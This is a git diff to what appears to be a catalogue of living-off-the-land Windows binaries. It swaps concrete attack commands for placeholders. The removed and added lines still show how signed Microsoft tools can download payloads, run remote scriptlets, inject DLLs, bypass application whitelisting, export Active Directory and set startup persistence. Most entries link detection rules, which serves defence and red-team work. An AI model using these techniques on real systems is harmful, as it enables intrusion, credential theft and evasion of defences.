executable as a subprocess of Mftrace.exe. Usecase: Local execution of cmd.exe as a subprocess of Mftrace.exe. Category: Execute Privileges: User @@ -13,22 +13,11 @@ Commands: OperatingSystem: Windows Tags: - Execute: EXE - - Command: Mftrace.exe powershell.exe - Description: Launch cmd.exe as a subprocess of Mftrace.exe. - Usecase: Local execution of powershell.exe as a subprocess of Mftrace.exe. - Category: Execute - Privileges: User - MitreID: T1127 - OperatingSystem: Windows - Tags: - - Execute: EXE Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x86\mftrace.exe - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x64\mftrace.exe - Path: C:\Program Files (x86)\Windows Kits\10\bin\x86\mftrace.exe - Path: C:\Program Files (x86)\Windows Kits\10\bin\x64\mftrace.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_mftrace.yml Resources: diff --git a/yml/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey.yml b/yml/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey.yml index 7ca4f43..3afd6cd 100644 --- a/yml/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey.yml +++ b/yml/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey.yml @@ -4,8 +4,8 @@ Description: Part of the NodeJS Visual Studio tools. Author: mr.d0x Created: 2022-01-20 Commands: - - Command: Microsoft.NodejsTools.PressAnyKey.exe normal 1 cmd.exe - Description: Launch cmd.exe as a subprocess of Microsoft.NodejsTools.PressAnyKey.exe. + - Command: Microsoft.NodejsTools.PressAnyKey.exe normal 1 {PATH:.exe} + Description: Launch specified executable as a subprocess of Microsoft.NodejsTools.PressAnyKey.exe. Usecase: Spawn a new process via Microsoft.NodejsTools.PressAnyKey.exe. Category: Execute Privileges: User diff --git a/yml/OtherMSBinaries/Msaccess.yml b/yml/OtherMSBinaries/Msaccess.yml index 618cbdb..7c5b17a 100644 --- a/yml/OtherMSBinaries/Msaccess.yml +++ b/yml/OtherMSBinaries/Msaccess.yml @@ -4,7 +4,7 @@ Description: Microsoft Office component Author: Nir Chako Created: 2023-04-30 Commands: - - Command: MSAccess.exe https://example.com/payload.exe.mdb + - Command: MSAccess.exe {REMOTEURL} Description: Downloads payload from remote server Usecase: It will download a remote payload (if it has the filename extension .mdb) and place it in INetCache. Category: Download diff --git a/yml/OtherMSBinaries/Msdeploy.yml b/yml/OtherMSBinaries/Msdeploy.yml index 7cc0921..edafbf4 100644 --- a/yml/OtherMSBinaries/Msdeploy.yml +++ b/yml/OtherMSBinaries/Msdeploy.yml @@ -1,11 +1,11 @@ --- Name: Msdeploy.exe Description: Microsoft tool used to deploy Web Applications. -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\calc.bat" - Description: Launch calc.bat via msdeploy.exe. + - Command: msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="{PATH_ABSOLUTE:.bat}" + Description: Launch .bat file via msdeploy.exe. Usecase: Local execution of batch file using msdeploy.exe. Category: Execute Privileges: User @@ -13,8 +13,8 @@ Commands: OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11, Windows Server Tags: - Execute: CMD - - Command: msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\calc.bat" - Description: Launch calc.bat via msdeploy.exe. + - Command: msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="{PATH_ABSOLUTE:.bat}" + Description: Launch .bat file via msdeploy.exe. Usecase: Local execution of batch file using msdeploy.exe. Category: AWL Bypass Privileges: User @@ -22,7 +22,7 @@ Commands: OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11, Windows Server Tags: - Execute: CMD - - Command: msdeploy.exe -verb:sync -source:filePath=C:\windows\system32\calc.exe -dest:filePath=C:\Users\Public\calc.exe + - Command: msdeploy.exe -verb:sync -source:filePath={PATH_ABSOLUTE:.source.ext} -dest:filePath={PATH_ABSOLUTE:.dest.ext} Description: Copy file from source to destination. Usecase: Copy file. Category: Copy @@ -38,8 +38,6 @@ Full_Path: - Path: C:\Program Files (x86)\IIS\Microsoft Web Deploy V4\msdeploy.exe - Path: C:\Program Files\IIS\Microsoft Web Deploy V5\msdeploy.exe - Path: C:\Program Files (x86)\IIS\Microsoft Web Deploy V5\msdeploy.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_msdeploy.yml Resources: diff --git a/yml/OtherMSBinaries/MsoHtmEd.yml b/yml/OtherMSBinaries/MsoHtmEd.yml index a1af94e..faafee4 100644 --- a/yml/OtherMSBinaries/MsoHtmEd.yml +++ b/yml/OtherMSBinaries/MsoHtmEd.yml @@ -4,7 +4,7 @@ Description: Microsoft Office component Author: Nir Chako Created: 2022-07-24 Commands: - - Command: MsoHtmEd.exe https://example.com/payload + - Command: MsoHtmEd.exe {REMOTEURL} Description: Downloads payload from remote server Usecase: It will download a remote payload and place it in INetCache. Category: Download diff --git a/yml/OtherMSBinaries/Mspub.yml b/yml/OtherMSBinaries/Mspub.yml index e325d90..dd1c59d 100644 --- a/yml/OtherMSBinaries/Mspub.yml +++ b/yml/OtherMSBinaries/Mspub.yml @@ -4,7 +4,7 @@ Description: Microsoft Publisher Author: Nir Chako Created: 2022-08-02 Commands: - - Command: mspub.exe https://example.com/payload + - Command: mspub.exe {REMOTEURL} Description: Downloads payload from remote server Usecase: It will download a remote payload and place it in INetCache. Category: Download diff --git a/yml/OtherMSBinaries/Msxsl.yml b/yml/OtherMSBinaries/Msxsl.yml index d87746e..4b9372c 100644 --- a/yml/OtherMSBinaries/Msxsl.yml +++ b/yml/OtherMSBinaries/Msxsl.yml @@ -1,10 +1,10 @@ --- Name: msxsl.exe Description: Command line utility used to perform XSL transformations. -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: msxsl.exe customers.xml script.xsl + - Command: msxsl.exe {PATH:.xml} {PATH:.xsl} Description: Run COM Scriptlet code within the script.xsl file (local). Usecase: Local execution of script stored in XSL file. Category: Execute @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows Tags: - Execute: XSL - - Command: msxsl.exe customers.xml script.xsl + - Command: msxsl.exe {PATH:.xml} {PATH:.xsl} Description: Run COM Scriptlet code within the script.xsl file (local). Usecase: Local execution of script stored in XSL file. Category: AWL Bypass @@ -22,7 +22,7 @@ Commands: OperatingSystem: Windows Tags: - Execute: XSL - - Command: msxsl.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml + - Command: msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xsl} Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote). Usecase: Local execution of remote script stored in XSL script stored as an XML file. Category: Execute @@ -32,7 +32,7 @@ Commands: Tags: - Execute: XSL - Execute: Remote - - Command: msxsl.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml + - Command: msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xml} Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote). Usecase: Local execution of remote script stored in XSL script stored as an XML file. Category: AWL Bypass @@ -42,14 +42,14 @@ Commands: Tags: - Execute: XSL - Execute: Remote - - Command: msxsl.exe https://raw.githubusercontent.com/RonnieSalomonsen/Use-msxsl-to-download-file/main/calc.xml https://raw.githubusercontent.com/RonnieSalomonsen/Use-msxsl-to-download-file/main/transform.xsl -o + - Command: msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xsl} -o {PATH} Description: Using remote XML and XSL files, save the transformed XML file to disk. Usecase: Download a file from the internet and save it to disk. Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows - - Command: msxsl.exe https://raw.githubusercontent.com/RonnieSalomonsen/Use-msxsl-to-download-file/main/calc.xml https://raw.githubusercontent.com/RonnieSalomonsen/Use-msxsl-to-download-file/main/transform.xsl -o :ads-name + - Command: msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xsl} -o {PATH}:ads-name Description: Using remote XML and XSL files, save the transformed XML file to an Alternate Data Stream (ADS). Usecase: Download a file from the internet and save it to an NTFS Alternate Data Stream. Category: ADS diff --git a/yml/OtherMSBinaries/Ntdsutil.yml b/yml/OtherMSBinaries/Ntdsutil.yml index f95f045..e8b78c0 100644 --- a/yml/OtherMSBinaries/Ntdsutil.yml +++ b/yml/OtherMSBinaries/Ntdsutil.yml @@ -1,7 +1,7 @@ --- Name: ntdsutil.exe Description: Command line utility used to export Active Directory. -Author: 'Tony Lambert' +Author: Tony Lambert Created: 2020-01-10 Commands: - Command: ntdsutil.exe "ac i ntds" "ifm" "create full c:\" q q @@ -13,8 +13,6 @@ Commands: OperatingSystem: Windows Full_Path: - Path: C:\Windows\System32\ntdsutil.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_ntdsutil_usage.yml - Splunk: https://github.com/splunk/security_content/blob/2b87b26bdc2a84b65b1355ffbd5174bdbdb1879c/detections/endpoint/ntdsutil_export_ntds.yml diff --git a/yml/OtherMSBinaries/OpenConsole.yml b/yml/OtherMSBinaries/OpenConsole.yml index a6ddcb7..56c6579 100644 --- a/yml/OtherMSBinaries/OpenConsole.yml +++ b/yml/OtherMSBinaries/OpenConsole.yml @@ -4,8 +4,8 @@ Description: Console Window host for Windows Terminal Author: Nasreddine Bencherchali Created: 2022-06-17 Commands: - - Command: "OpenConsole.exe calc" - Description: Execute calc with OpenConsole.exe as parent process + - Command: OpenConsole.exe {PATH:.exe} + Description: Execute specified process with OpenConsole.exe as parent process Usecase: Use OpenConsole.exe as a proxy binary to evade defensive counter-measures Category: Execute Privileges: User diff --git a/yml/OtherMSBinaries/Powerpnt.yml b/yml/OtherMSBinaries/Powerpnt.yml index b72699d..c535c42 100644 --- a/yml/OtherMSBinaries/Powerpnt.yml +++ b/yml/OtherMSBinaries/Powerpnt.yml @@ -4,7 +4,7 @@ Description: Microsoft Office binary. Author: 'Reegun J (OCBC Bank)' Created: 2019-07-19 Commands: - - Command: Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll" + - Command: Powerpnt.exe {REMOTEURL} Description: Downloads payload from remote server Usecase: It will download a remote payload and place it in INetCache. Category: Download diff --git a/yml/OtherMSBinaries/Procdump.yml b/yml/OtherMSBinaries/Procdump.yml index 0b05151..1238c06 100644 --- a/yml/OtherMSBinaries/Procdump.yml +++ b/yml/OtherMSBinaries/Procdump.yml @@ -6,8 +6,8 @@ Aliases: Author: 'Alfie Champion (@ajpc500)' Created: 2020-10-14 Commands: - - Command: procdump.exe -md calc.dll explorer.exe - Description: Loads calc.dll where DLL is configured with a 'MiniDumpCallbackRoutine' exported function. Valid process must be provided as dump still created. + - Command: procdump.exe -md {PATH:.dll} explorer.exe + Description: Loads the specified DLL where DLL is configured with a 'MiniDumpCallbackRoutine' exported function. Valid process must be provided as dump still created. Usecase: Performs execution of unsigned DLL. Category: Execute Privileges: User @@ -15,8 +15,8 @@ Commands: OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher Tags: - Execute: DLL - - Command: procdump.exe -md calc.dll foobar - Description: Loads calc.dll where configured with DLL_PROCESS_ATTACH execution, process argument can be arbitrary. + - Command: procdump.exe -md {PATH:.dll} foobar + Description: Loads the specified DLL where configured with DLL_PROCESS_ATTACH execution, process argument can be arbitrary. Usecase: Performs execution of unsigned DLL. Category: Execute Privileges: User diff --git a/yml/OtherMSBinaries/ProtocolHandler.yml b/yml/OtherMSBinaries/ProtocolHandler.yml index 250fbf8..b3c81c2 100644 --- a/yml/OtherMSBinaries/ProtocolHandler.yml +++ b/yml/OtherMSBinaries/ProtocolHandler.yml @@ -4,7 +4,7 @@ Description: Microsoft Office binary Author: Nir Chako Created: 2022-07-24 Commands: - - Command: ProtocolHandler.exe https://example.com/payload + - Command: ProtocolHandler.exe {REMOTEURL} Description: Downloads payload from remote server Usecase: "It will open the specified URL in the default web browser, which (if the URL points to a file) will often result in the file being downloaded to the user's Downloads folder (without user interaction)" Category: Download diff --git a/yml/OtherMSBinaries/Rcsi.yml b/yml/OtherMSBinaries/Rcsi.yml index 7090e1e..cfb8fbb 100644 --- a/yml/OtherMSBinaries/Rcsi.yml +++ b/yml/OtherMSBinaries/Rcsi.yml @@ -1,10 +1,10 @@ --- Name: rcsi.exe Description: Non-Interactive command line inerface included with Visual Studio. -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: rcsi.exe bypass.csx + - Command: rcsi.exe {PATH:.csx} Description: Use embedded C# within the csx script to execute the code. Usecase: Local execution of arbitrary C# code stored in local CSX file. Category: Execute @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows Tags: - Execute: CSharp - - Command: rcsi.exe bypass.csx + - Command: rcsi.exe {PATH:.csx} Description: Use embedded C# within the csx script to execute the code. Usecase: Local execution of arbitrary C# code stored in local CSX file. Category: AWL Bypass @@ -24,8 +24,6 @@ Commands: - Execute: CSharp Full_Path: - Path: no default -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_csi_execution.yml - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml diff --git a/yml/OtherMSBinaries/Remote.yml b/yml/OtherMSBinaries/Remote.yml index cb63fb6..3380ce3 100644 --- a/yml/OtherMSBinaries/Remote.yml +++ b/yml/OtherMSBinaries/Remote.yml @@ -4,8 +4,8 @@ Description: Debugging tool included with Windows Debugging Tools Author: mr.d0x Created: 2021-06-01 Commands: - - Command: Remote.exe /s "powershell.exe" anythinghere - Description: Spawns powershell as a child process of remote.exe + - Command: Remote.exe /s {PATH:.exe} anythinghere + Description: Spawns specified executable as a child process of remote.exe Usecase: Executes a process under a trusted Microsoft signed binary Category: AWL Bypass Privileges: User @@ -13,8 +13,8 @@ Commands: OperatingSystem: Windows Tags: - Execute: EXE - - Command: Remote.exe /s "powershell.exe" anythinghere - Description: Spawns powershell as a child process of remote.exe + - Command: Remote.exe /s {PATH:.exe} anythinghere + Description: Spawns specified executable as a child process of remote.exe Usecase: Executes a process under a trusted Microsoft signed binary Category: Execute Privileges: User @@ -22,7 +22,7 @@ Commands: OperatingSystem: Windows Tags: - Execute: EXE - - Command: Remote.exe /s "\\10.10.10.30\binaries\file.exe" anythinghere + - Command: Remote.exe /s {PATH_SMB:.exe} anythinghere Description: Run a remote file Usecase: Executing a remote binary without saving file to disk Category: Execute @@ -35,8 +35,6 @@ Commands: Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe -Code_Sample: - - Code: Detection: - IOC: remote.exe process spawns - Sigma: https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_remote.yml diff --git a/yml/OtherMSBinaries/Sqldumper.yml b/yml/OtherMSBinaries/Sqldumper.yml index 2417441..935bcba 100644 --- a/yml/OtherMSBinaries/Sqldumper.yml +++ b/yml/OtherMSBinaries/Sqldumper.yml @@ -1,7 +1,7 @@ --- Name: Sqldumper.exe Description: Debugging utility included with Microsoft SQL. -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: sqldumper.exe 464 0 0x0110 @@ -21,8 +21,6 @@ Commands: Full_Path: - Path: C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe - Path: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis\AS OLEDB\140\SQLDumper.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml - Elastic: https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_lsass_memdump_file_created.toml diff --git a/yml/OtherMSBinaries/Sqlps.yml b/yml/OtherMSBinaries/Sqlps.yml index e495ef0..fb8477b 100644 --- a/yml/OtherMSBinaries/Sqlps.yml +++ b/yml/OtherMSBinaries/Sqlps.yml @@ -1,7 +1,7 @@ --- Name: Sqlps.exe Description: Tool included with Microsoft SQL Server that loads SQL Server cmdlets. Microsoft SQL Server\100 and 110 are Powershell v2. Microsoft SQL Server\120 and 130 are Powershell version 4. Replaced by SQLToolsPS.exe in SQL Server 2016, but will be included with installation for compatability reasons. -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: Sqlps.exe -noprofile @@ -19,8 +19,6 @@ Full_Path: - Path: C:\Program files (x86)\Microsoft SQL Server\120\Tools\Binn\sqlps.exe - Path: C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe - Path: C:\Program Files (x86)\Microsoft SQL Server\150\Tools\Binn\SQLPS.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_mssql_sqlps_susp_execution.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_dll_system_management_automation_susp_load.yml diff --git a/yml/OtherMSBinaries/Sqltoolsps.yml b/yml/OtherMSBinaries/Sqltoolsps.yml index b7c66aa..b4ca186 100644 --- a/yml/OtherMSBinaries/Sqltoolsps.yml +++ b/yml/OtherMSBinaries/Sqltoolsps.yml @@ -1,10 +1,10 @@ --- Name: SQLToolsPS.exe Description: Tool included with Microsoft SQL that loads SQL Server cmdlts. A replacement for sqlps.exe. Successor to sqlps.exe in SQL Server 2016+. -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: SQLToolsPS.exe -noprofile -command Start-Process calc.exe + - Command: SQLToolsPS.exe -noprofile -command Start-Process {PATH:.exe} Description: Run a SQL Server PowerShell mini-console without Module and ScriptBlock Logging. Usecase: Execute PowerShell command. Category: Execute @@ -15,8 +15,6 @@ Commands: - Execute: PowerShell Full_Path: - Path: C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_mssql_sqltoolsps_susp_execution.yml - Splunk: https://github.com/splunk/security_content/blob/aa9f7e0d13a61626c69367290ed1b7b71d1281fd/docs/_posts/2021-10-05-suspicious_copy_on_system32.md diff --git a/yml/OtherMSBinaries/Squirrel.yml b/yml/OtherMSBinaries/Squirrel.yml index a8207ad..6ff1b20 100644 --- a/yml/OtherMSBinaries/Squirrel.yml +++ b/yml/OtherMSBinaries/Squirrel.yml @@ -4,14 +4,14 @@ Description: Binary to update the existing installed Nuget/squirrel package. Par Author: 'Reegun J (OCBC Bank) - @reegun21' Created: 2019-06-26 Commands: - - Command: squirrel.exe --download [url to package] + - Command: squirrel.exe --download {REMOTEURL} Description: The above binary will go to url and look for RELEASES file and download the nuget package. Usecase: Download binary Category: Download Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed - - Command: squirrel.exe --update [url to package] + - Command: squirrel.exe --update {REMOTEURL} Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary Category: AWL Bypass @@ -21,7 +21,7 @@ Commands: Tags: - Execute: Nuget - Execute: Remote - - Command: squirrel.exe --update [url to package] + - Command: squirrel.exe --update {REMOTEURL} Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary Category: Execute @@ -31,7 +31,7 @@ Commands: Tags: - Execute: Nuget - Execute: Remote - - Command: squirrel.exe --updateRollback=[url to package] + - Command: squirrel.exe --updateRollback={REMOTEURL} Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary Category: AWL Bypass @@ -41,7 +41,7 @@ Commands: Tags: - Execute: Nuget - Execute: Remote - - Command: squirrel.exe --updateRollback=[url to package] + - Command: squirrel.exe --updateRollback={REMOTEURL} Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary Category: Execute diff --git a/yml/OtherMSBinaries/Te.yml b/yml/OtherMSBinaries/Te.yml index d5d0580..e63c73b 100644 --- a/yml/OtherMSBinaries/Te.yml +++ b/yml/OtherMSBinaries/Te.yml @@ -4,7 +4,7 @@ Description: Testing tool included with Microsoft Test Authoring and Execution F Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: te.exe bypass.wsc + - Command: te.exe {PATH:.wsc} Description: Run COM Scriptlets (e.g. VBScript) by calling a Windows Script Component (WSC) file. Usecase: Execute Visual Basic script stored in local Windows Script Component file. Category: Execute @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows Tags: - Execute: WSH - - Command: te.exe test.dll + - Command: te.exe {PATH:.dll} Description: Execute commands from a DLL file with Test Authoring and Execution Framework (TAEF) tests. See resources section for required structures. Usecase: Execute DLL file. Category: Execute diff --git a/yml/OtherMSBinaries/Teams.yml b/yml/OtherMSBinaries/Teams.yml index 622843c..1511e29 100644 --- a/yml/OtherMSBinaries/Teams.yml +++ b/yml/OtherMSBinaries/Teams.yml @@ -22,7 +22,7 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: Node.JS - - Command: teams.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c ping google.com &&" + - Command: teams.exe --disable-gpu-sandbox --gpu-launcher="{CMD} &&" Description: Teams spawns cmd.exe as a child process of teams.exe and executes the ping command Usecase: Executes a process under a trusted Microsoft signed binary Category: Execute diff --git a/yml/OtherMSBinaries/Tracker.yml b/yml/OtherMSBinaries/Tracker.yml index abaddfd..c94a43e 100644 --- a/yml/OtherMSBinaries/Tracker.yml +++ b/yml/OtherMSBinaries/Tracker.yml @@ -1,10 +1,10 @@ --- Name: Tracker.exe Description: Tool included with Microsoft .Net Framework. -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: Tracker.exe /d .\calc.dll /c C:\Windows\write.exe + - Command: Tracker.exe /d {PATH:.dll} /c C:\Windows\write.exe Description: Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions. Usecase: Injection of locally stored DLL file into target process. Category: Execute @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows Tags: - Execute: DLL - - Command: Tracker.exe /d .\calc.dll /c C:\Windows\write.exe + - Command: Tracker.exe /d {PATH:.dll} /c C:\Windows\write.exe Description: Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions. Usecase: Injection of locally stored DLL file into target process. Category: AWL Bypass @@ -24,8 +24,6 @@ Commands: - Execute: DLL Full_Path: - Path: no default -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_tracker.yml Resources: diff --git a/yml/OtherMSBinaries/Update.yml b/yml/OtherMSBinaries/Update.yml index 1dde3d0..81b704e 100644 --- a/yml/OtherMSBinaries/Update.yml +++ b/yml/OtherMSBinaries/Update.yml @@ -1,17 +1,17 @@ --- Name: Update.exe Description: Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation. -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2019-06-26 Commands: - - Command: Update.exe --download [url to package] + - Command: Update.exe --download {REMOTEURL} Description: The above binary will go to url and look for RELEASES file and download the nuget package. Usecase: Download binary Category: Download Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed - - Command: Update.exe --update=[url to package] + - Command: Update.exe --update={REMOTEURL} Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary Category: AWL Bypass @@ -21,7 +21,7 @@ Commands: Tags: - Execute: Nuget - Execute: Remote - - Command: Update.exe --update=[url to package] + - Command: Update.exe --update={REMOTEURL} Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary Category: Execute @@ -31,7 +31,7 @@ Commands: Tags: - Execute: Nuget - Execute: Remote - - Command: Update.exe --update=\\remoteserver\payloadFolder + - Command: Update.exe --update={PATH_SMB:folder} Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. Usecase: Download and execute binary Category: AWL Bypass @@ -41,7 +41,7 @@ Commands: Tags: - Execute: Nuget - Execute: Remote - - Command: Update.exe --update=\\remoteserver\payloadFolder + - Command: Update.exe --update={PATH_SMB:folder} Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. Usecase: Download and execute binary Category: Execute @@ -51,7 +51,7 @@ Commands: Tags: - Execute: Nuget - Execute: Remote - - Command: Update.exe --updateRollback=[url to package] + - Command: Update.exe --updateRollback={REMOTEURL} Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary Category: AWL Bypass @@ -61,7 +61,7 @@ Commands: Tags: - Execute: Nuget - Execute: Remote - - Command: Update.exe --updateRollback=[url to package] + - Command: Update.exe --updateRollback={REMOTEURL} Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary Category: Execute @@ -71,7 +71,7 @@ Commands: Tags: - Execute: Nuget - Execute: Remote - - Command: Update.exe --processStart payload.exe --process-start-args "whatever args" + - Command: Update.exe --processStart {PATH:.exe} --process-start-args "{CMD:args}" Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied. Usecase: Application Whitelisting Bypass Category: AWL Bypass @@ -81,7 +81,7 @@ Commands: Tags: - Execute: CMD - Execute: Remote - - Command: Update.exe --updateRollback=\\remoteserver\payloadFolder + - Command: Update.exe --updateRollback={PATH_SMB:folder} Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. Usecase: Download and execute binary Category: AWL Bypass @@ -91,7 +91,7 @@ Commands: Tags: - Execute: Nuget - Execute: Remote - - Command: Update.exe --updateRollback=\\remoteserver\payloadFolder + - Command: Update.exe --updateRollback={PATH_SMB:folder} Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. Usecase: Download and execute binary Category: Execute @@ -101,7 +101,7 @@ Commands: Tags: - Execute: Nuget - Execute: Remote - - Command: Update.exe --processStart payload.exe --process-start-args "whatever args" + - Command: Update.exe --processStart {PATH:.exe} --process-start-args "{CMD:args}" Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied. Usecase: Execute binary Category: Execute @@ -110,8 +110,8 @@ Commands: OperatingSystem: Windows 7 and up with Microsoft Teams installed Tags: - Execute: CMD - - Command: Update.exe --createShortcut=payload.exe -l=Startup - Description: Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a payload.exe shortcut in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it. + - Command: Update.exe --createShortcut={PATH:.exe} -l=Startup + Description: Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a shortcut to the specified executable in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it. Usecase: Execute binary Category: Execute Privileges: User @@ -119,7 +119,7 @@ Commands: OperatingSystem: Windows 7 and up with Microsoft Teams installed Tags: - Execute: EXE - - Command: Update.exe --removeShortcut=payload.exe -l=Startup + - Command: Update.exe --removeShortcut={PATH:.exe}-l=Startup Description: Run the command to remove the shortcut created in the "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" directory you created with the LolBinExecution "--createShortcut" described on this page. Usecase: Execute binary Category: Execute diff --git a/yml/OtherMSBinaries/VSDiagnostics.yml b/yml/OtherMSBinaries/VSDiagnostics.yml index 1713678..d24327f 100644 --- a/yml/OtherMSBinaries/VSDiagnostics.yml +++ b/yml/OtherMSBinaries/VSDiagnostics.yml @@ -4,7 +4,7 @@ Description: Command-line tool used for performing diagnostics. Author: Bobby Cooke Created: 2023-07-12 Commands: - - Command: VSDiagnostics.exe start 1 /launch:calc.exe + - Command: VSDiagnostics.exe start 1 /launch:{PATH:.exe} Description: Starts a collection session with sessionID 1 and calls kernelbase.CreateProcessW to launch specified executable. Usecase: Proxy execution of binary Category: Execute @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - - Command: VSDiagnostics.exe start 2 /launch:cmd.exe /launchArgs:"/c calc.exe" + - Command: VSDiagnostics.exe start 2 /launch:{PATH:.exe} /launchArgs:"{CMD:args}" Description: Starts a collection session with sessionID 2 and calls kernelbase.CreateProcessW to launch specified executable. Arguments specified in launchArgs are passed to CreateProcessW. Usecase: Proxy execution of binary with arguments 